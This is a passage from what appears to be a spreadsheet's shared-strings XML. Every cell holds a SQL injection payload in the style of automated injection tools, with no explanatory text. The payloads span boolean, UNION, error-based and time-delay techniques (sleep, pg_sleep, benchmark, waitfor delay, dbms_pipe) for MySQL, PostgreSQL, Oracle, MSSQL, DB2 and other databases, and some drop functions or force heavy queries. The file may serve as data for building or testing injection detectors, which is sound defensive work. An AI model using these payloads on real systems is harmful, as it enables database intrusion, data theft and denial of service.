  </si>
  <si>
    <t>1" )  and 3732 = 3850 and  ( "edjv" = "edjv</t>
  </si>
  <si>
    <t>1" where 8571 = 8571</t>
  </si>
  <si>
    <t>select case when 4656 = 3716 then 1 else null end--</t>
  </si>
  <si>
    <t>-6014'  )  )   or  ( 9860 = 4848 ) *4848 and   (  (  'qtge' = 'qtge</t>
  </si>
  <si>
    <t>1' )  where 2284 = 2284 and make_set ( 8403 = 8403,8899 ) --</t>
  </si>
  <si>
    <t xml:space="preserve">1, ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 9693 = 9693,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   ) </t>
  </si>
  <si>
    <t>select  ( case when  ( 6047 = 8897 )  then 6047 else 6047* ( select 6047 from information_schema.character_sets )  end ) #</t>
  </si>
  <si>
    <t>-8308" )  union all select 3084,3084,3084,3084,3084,3084,3084,3084,3084#</t>
  </si>
  <si>
    <t>1'|| ( select 'lzvb' where 1637 = 1637 union all select null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>-4768'|| ( select 'dded' from dual where 6499 = 6499 union all select 6499--</t>
  </si>
  <si>
    <t>1'  )  )   or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and   (  (  'lqpd' = 'lqpd</t>
  </si>
  <si>
    <t>select  ( case when  ( 9490 = 6134 )  then 9490 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--</t>
  </si>
  <si>
    <t>1 where 9361 = 9361 and 7478 = 9170--</t>
  </si>
  <si>
    <t>1  )  )   and make_set ( 8403 = 8403,8899 )  and   (  (  4686 = 4686</t>
  </si>
  <si>
    <t>1' in boolean mode )  and  ( 3020 = 3020 ) *6703#</t>
  </si>
  <si>
    <t>1  )  )   )  order by 1--</t>
  </si>
  <si>
    <t>1" )  and 4595 = 4595#</t>
  </si>
  <si>
    <t>1'  )  )   and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x )  and   (  (  'adnz' = 'adnz</t>
  </si>
  <si>
    <t>-6100' )  as kvfc where 2377 = 2377 or 6872 = 6872--</t>
  </si>
  <si>
    <t xml:space="preserve"> select sleep ( 5 )  and   (  (  'uyft' = 'uyft</t>
  </si>
  <si>
    <t>1%' )  and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 )  = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1"  )  )   or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c  )  )  #</t>
  </si>
  <si>
    <t>1%"  )  )   or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>1 )  as nfgb where 2503 = 2503 and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) --</t>
  </si>
  <si>
    <t>1' and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and 'hhbh' = 'hhbh</t>
  </si>
  <si>
    <t xml:space="preserve">1" and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) </t>
  </si>
  <si>
    <t xml:space="preserve"> end and  ( 'uxzv' = 'uxzv</t>
  </si>
  <si>
    <t>-8699" )  union all select 8645,8645,8645,8645,8645,8645--</t>
  </si>
  <si>
    <t>-2483' where 1327 = 1327 union all select 1327#</t>
  </si>
  <si>
    <t>1' )  as syer where 3141 = 3141 rlike  ( select  ( case when  ( 6233 = 7567 )  then 1 else 0x28 end  )  )  --</t>
  </si>
  <si>
    <t>-9003"  )  )   union all select 9721,9721--</t>
  </si>
  <si>
    <t>1%"  )  )   )  and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1" )  where 2922 = 2922 or elt ( 6272 = 6272,sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>1' and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and 'fjfo' = 'fjfo</t>
  </si>
  <si>
    <t>-1280'  )  )   or 8571 = 8571--</t>
  </si>
  <si>
    <t>1%'  )  )   )  or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>-7202%"  )  )   union all select 2901#</t>
  </si>
  <si>
    <t>1"  )  )   or 4240 =  ( select 4240 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>1%'  )  )   )  and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>1" where 2642 = 2642 or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>select pg_sleep ( 5 ) #</t>
  </si>
  <si>
    <t>1%" and 1343 = 5939#</t>
  </si>
  <si>
    <t xml:space="preserve">1" and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) </t>
  </si>
  <si>
    <t>1 and  ( 3020 = 3020 ) *6703</t>
  </si>
  <si>
    <t>1 )  where 9469 = 9469 or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and   (  (  7700 = 7700</t>
  </si>
  <si>
    <t>-4484'  )  )   or 6872 = 6872 and   (  (  'oxuo' = 'oxuo</t>
  </si>
  <si>
    <t>1  )  )   or 1022 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>1' )  where 8586 = 8586 and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>1%"  )  )   union all select null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and   (  (   ( 'squj' = 'squj</t>
  </si>
  <si>
    <t>-3966' )  or 7338 = 8657</t>
  </si>
  <si>
    <t>-4610'  )  )   or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||ch</t>
  </si>
  <si>
    <t>1'|| ( select 'sliy' where 9494 = 9494</t>
  </si>
  <si>
    <t>-1238' )  as lxur where 7075 = 7075 union all select 7075,7075,7075,7075,7075,7075,7075,7075,7075,7075#</t>
  </si>
  <si>
    <t>1%' )  and 2949 = 4847 and  ( '%' = '</t>
  </si>
  <si>
    <t>1" )  as qmtx where 5280 = 5280 or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>1"  )  )   or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (  "dbxi" like "dbxi</t>
  </si>
  <si>
    <t>1'  )  )   )  or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and   (  (   ( 'vjkf' like 'vjkf</t>
  </si>
  <si>
    <t>1  )  )   as rroe where 4840 = 4840</t>
  </si>
  <si>
    <t>1"  )  )   and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (  "fkip" = "fkip</t>
  </si>
  <si>
    <t>1' )  as ssxj where 3845 = 3845 or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --</t>
  </si>
  <si>
    <t>1' )  and 7533 = 7533 and  ( 'xyga' like 'xyga</t>
  </si>
  <si>
    <t>-2120" )  union all select 9614--</t>
  </si>
  <si>
    <t>-3895' )  or 8645 = 5359--</t>
  </si>
  <si>
    <t>1' )  as ssez where 5351 = 5351 or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 )  = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1%' procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75  )  )    )  )   ) ,1 ) #</t>
  </si>
  <si>
    <t>1' )  where 7903 = 7903</t>
  </si>
  <si>
    <t xml:space="preserve">select pg_sleep ( 5 ) </t>
  </si>
  <si>
    <t>-7037'  )  )   as epsg where 3684 = 3684 union all select 3684--</t>
  </si>
  <si>
    <t>select  ( case when  ( 5418 = 6516 )  then 1 else 5418* ( select 5418 from master..sysdatabases )  end ) --</t>
  </si>
  <si>
    <t>1"  )  )   as rhea where 2982 = 2982 or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu ) --</t>
  </si>
  <si>
    <t>1'  )  )   )  and 4069 = 8786 and   (  (   ( 'eftr' = 'eftr</t>
  </si>
  <si>
    <t>1'  )  )   and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x )  and   (  (  'fdoc' like 'fdoc</t>
  </si>
  <si>
    <t>1%' union all select null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>-3300' union all select 8979,8979,8979,8979,8979,8979--</t>
  </si>
  <si>
    <t>1'  )  )   and  ( 3020 = 3020 ) *6703 and   (  (  'mgfd' = 'mgfd</t>
  </si>
  <si>
    <t>1' and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and 'ymnm' = 'ymnm</t>
  </si>
  <si>
    <t>1%" )  union all select null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1' or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and 'eqyr' like 'eqyr</t>
  </si>
  <si>
    <t>1'  )  )   or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and   (  (  'rdpv' = 'rdpv</t>
  </si>
  <si>
    <t>1 where 2363 = 2363 union all select null,null,null,null,null--</t>
  </si>
  <si>
    <t>select pg_sleep ( 5 )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null )  and   (  (   ( 'opyt' = 'opyt</t>
  </si>
  <si>
    <t>1" and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and "oyuj" = "oyuj</t>
  </si>
  <si>
    <t>-7950' )  or 9323 = 9323#</t>
  </si>
  <si>
    <t>1' )  and 4822 = 6997 and  ( 'ojku' = 'ojku</t>
  </si>
  <si>
    <t>-2411%'  )  )   )  or 6872 = 6872 and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>1" where 8732 = 8732</t>
  </si>
  <si>
    <t>1'  )  )   )  and elt ( 1210 = 1210,sleep ( 5  )  )   and   (  (   ( 'mbxh' like 'mbxh</t>
  </si>
  <si>
    <t>-4849"  )  )   or  ( 5005 = 9111 ) *9111 and   (  (  "catv" like "catv</t>
  </si>
  <si>
    <t>1'+ ( select 'xqpe' where 4020 = 4020 union all select null,null--</t>
  </si>
  <si>
    <t>1'  )  )   )  rlike sleep ( 5 )  and   (  (   ( 'svuu' = 'svuu</t>
  </si>
  <si>
    <t xml:space="preserve">-5585' or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 </t>
  </si>
  <si>
    <t>1"  )  )   as yiaw where 2841 = 2841 or sleep ( 5 ) --</t>
  </si>
  <si>
    <t>1" and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and "jcgh" = "jcgh</t>
  </si>
  <si>
    <t>-5820'  )  )   as lkik where 4044 = 4044 or 7156 = 9197--</t>
  </si>
  <si>
    <t>1' where 2160 = 2160 and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )  --</t>
  </si>
  <si>
    <t>-6823'  )  )   )  or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122</t>
  </si>
  <si>
    <t>1'  )  )   )  or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (   ( 'akyc' = 'akyc</t>
  </si>
  <si>
    <t>-9606 or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113</t>
  </si>
  <si>
    <t>select  ( case when  ( 1407 = 2741 )  then 1407 else 1407* ( select 1407 from mysql.db )  end ) #</t>
  </si>
  <si>
    <t>-4223'  )  )   )  union all select 7913,7913,7913,7913,7913,7913,7913,7913,7913,7913#</t>
  </si>
  <si>
    <t>1 )  where 9307 = 9307</t>
  </si>
  <si>
    <t>1  )  )   and 2886 = 1133--</t>
  </si>
  <si>
    <t>-7749" or  ( 2689 = 7481 ) *7481</t>
  </si>
  <si>
    <t>-3978 or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 )</t>
  </si>
  <si>
    <t>1' )  as pwqs where 2291 = 2291</t>
  </si>
  <si>
    <t>select benchmark ( 5000000,md5 ( 0x4c4d6142  )  )   and '%' = '</t>
  </si>
  <si>
    <t>-2505' or 9323 = 9323#</t>
  </si>
  <si>
    <t>-2022  )  )   )  or 6812 = 3516 and   (  (   ( 3896 = 3896</t>
  </si>
  <si>
    <t>1" where 9829 = 9829 order by 1#</t>
  </si>
  <si>
    <t>1"  )  )   )  union all select null--</t>
  </si>
  <si>
    <t>-9111" or 3038 = 3038</t>
  </si>
  <si>
    <t>1" )  or 5356 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>-9886%'  )  )   )  union all select 5191,5191,5191,5191,5191,5191,5191--</t>
  </si>
  <si>
    <t>1%' )  or 4915 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>select benchmark ( 5000000,md5 ( 0x4c4d6142  )  )   and   (  (   ( "eqmy" = "eqmy</t>
  </si>
  <si>
    <t xml:space="preserve">1, ( select  ( case when  ( 3743 = 9640 )  then 1 else 3743* ( select 3743 from master..sysdatabases )  end  )  )  </t>
  </si>
  <si>
    <t>1%"  )  )   )  and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>-6587' )  union all select 6349,6349,6349,6349,6349,6349,6349,6349,6349,6349--</t>
  </si>
  <si>
    <t>1' where 4403 = 4403 rlike sleep ( 5 ) #</t>
  </si>
  <si>
    <t>1  )  )   )  and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x )  and   (  (   ( 4127 = 4127</t>
  </si>
  <si>
    <t>1'|| ( select 'fbtm' where 1335 = 1335 and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   ) ||'</t>
  </si>
  <si>
    <t>1' in boolean mode )  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   ) #</t>
  </si>
  <si>
    <t>1"  )  )   or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 )  and   (  (  "rurz" = "rurz</t>
  </si>
  <si>
    <t>-7726 or 3038 = 3038</t>
  </si>
  <si>
    <t>-8358'  )  )   )  union all select 7282,7282--</t>
  </si>
  <si>
    <t xml:space="preserve">1' )  and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual ) </t>
  </si>
  <si>
    <t>1' )  and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and  ( 'xfmq' = 'xfmq</t>
  </si>
  <si>
    <t>1  )  )   as qfnu where 1609 = 1609 and 8189 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>-8200' where 3422 = 3422 or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 11</t>
  </si>
  <si>
    <t>1"  )  )   as hiuf where 3277 = 3277 and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>1" where 8234 = 8234</t>
  </si>
  <si>
    <t>-5169"  )  )   union all select 6198,6198,6198,6198--</t>
  </si>
  <si>
    <t>if ( 5316 = 4416 )  select 5316 else drop function vtve--</t>
  </si>
  <si>
    <t>1%'  )  )   and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and   (  (  '%' = '</t>
  </si>
  <si>
    <t>1' )  and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and  ( 'qdsr' like 'qdsr</t>
  </si>
  <si>
    <t>1%' or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1' where 9544 = 9544</t>
  </si>
  <si>
    <t>waitfor delay '0:0:5' and '%' = '</t>
  </si>
  <si>
    <t>-3781%' )  union all select 7497,7497,7497,7497,7497--</t>
  </si>
  <si>
    <t>select case when 8237 = 9948 then 1 else null end--</t>
  </si>
  <si>
    <t>1'+ ( select hrgu where 9587 = 9587</t>
  </si>
  <si>
    <t>1'  )  )   and elt ( 1210 = 1210,sleep ( 5  )  )   and   (  (  'jnmf' = 'jnmf</t>
  </si>
  <si>
    <t>-5182"  )  )   or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t>-9975 where 9760 = 9760 order by 1--</t>
  </si>
  <si>
    <t>1'  )  )   and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and   (  (  'hpbt' = 'hpbt</t>
  </si>
  <si>
    <t>1  )  )   union all select null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and "rbqs" = "rbqs</t>
  </si>
  <si>
    <t>1'  )  )   as jtmf where 3937 = 3937</t>
  </si>
  <si>
    <t xml:space="preserve"> ( select  ( case when  ( 9066 = 5598 )  then 1 else 9066* ( select 9066 from information_schema.character_sets )  end  )  )  </t>
  </si>
  <si>
    <t>-9096" )  where 9452 = 9452 or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr</t>
  </si>
  <si>
    <t>1' )  where 8948 = 8948 and 8635 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>1 and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) # rhli</t>
  </si>
  <si>
    <t xml:space="preserve">1" or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a ) </t>
  </si>
  <si>
    <t>1%'  )  )   order by 1--</t>
  </si>
  <si>
    <t>1 and make_set ( 9542 = 8888,8888 ) -- idkn</t>
  </si>
  <si>
    <t>1"  )  )   as uels where 9447 = 9447 or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 ) --</t>
  </si>
  <si>
    <t>1"  )  )   as qgwq where 6122 = 6122</t>
  </si>
  <si>
    <t>-7041"  )  )   )  union all select 2159,2159,2159,2159,2159--</t>
  </si>
  <si>
    <t>select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   ) ||'</t>
  </si>
  <si>
    <t>-3566%' or 2158 = 6289</t>
  </si>
  <si>
    <t xml:space="preserve">1" and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )  </t>
  </si>
  <si>
    <t>1'  )  )   and  ( 1427 = 5813 ) *5813 and   (  (  'estb' like 'estb</t>
  </si>
  <si>
    <t>1'+ ( select 'rqok' where 5074 = 5074 and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) +'</t>
  </si>
  <si>
    <t>1'  )  )   or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x )  and   (  (  'wbsz' = 'wbsz</t>
  </si>
  <si>
    <t>1" )  and 9198 = 9198--</t>
  </si>
  <si>
    <t>1 )  union all select null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1'|| ( select 'gikt' where 8447 = 8447 or 1022 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>-6036  )  )   )  or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 11</t>
  </si>
  <si>
    <t>1%'  )  )   and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )   and   (  (  '%' = '</t>
  </si>
  <si>
    <t>select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and "jkfk" = "jkfk</t>
  </si>
  <si>
    <t>1' )  as ohnu where 4097 = 4097 union all select null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1"  )  )   and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null )  and   (  (  "oxvs" like "oxvs</t>
  </si>
  <si>
    <t>1 )  where 1193 = 1193 procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 ) --</t>
  </si>
  <si>
    <t>1'+ ( select 'ueak' where 7329 = 7329 and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric  )  )  +'</t>
  </si>
  <si>
    <t>1'  )  )   as efmy where 7299 = 7299 and 8635 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>1" )  as axua where 6718 = 6718</t>
  </si>
  <si>
    <t>-7940%" )  union all select 2779,2779,2779,2779,2779,2779,2779,2779,2779,2779#</t>
  </si>
  <si>
